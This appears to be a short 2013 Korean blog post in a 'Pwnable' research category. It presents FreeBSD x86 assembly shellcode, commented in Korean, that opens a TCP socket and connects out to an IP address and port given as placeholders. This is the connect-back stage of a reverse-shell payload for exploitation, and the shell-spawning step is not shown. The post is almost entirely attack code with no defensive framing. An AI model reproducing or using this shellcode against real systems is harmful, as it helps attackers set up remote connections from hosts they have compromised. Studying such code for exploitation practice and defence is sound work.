Research/Pwnable
[shellcode] FreeBSD x86 Socket/Connect
cheesechoi
2013. 8. 6. 15:45
.globl main
main:
# 초기화
xor %eax, %eax
xor %ebx, %ebx
xor %ecx, %ecx
xor %edx, %edx
# socket (PF_INET, SOCK_STREAM, 0) <== socket(2, 1, 0) 과 같음
push %edx
inc %edx
push %edx
inc %edx
push %edx
mov $0x61, %al
push %eax
int $0x80
# socketaddr_in
# IP 주소 Little Endian
push $0xXXXXXXXX
# Port Little Endian
pushw $0xXXXX
pushw $0x02AA
mov %esp, %ebx
# connect
# connect(3,{ AF_INET XXX.XXX.XXX.XXX:XX },16)
mov $0x10, %cl
push %ecx
push %ebx
push %eax
mov $0x62, %al
push %eax
int $0x80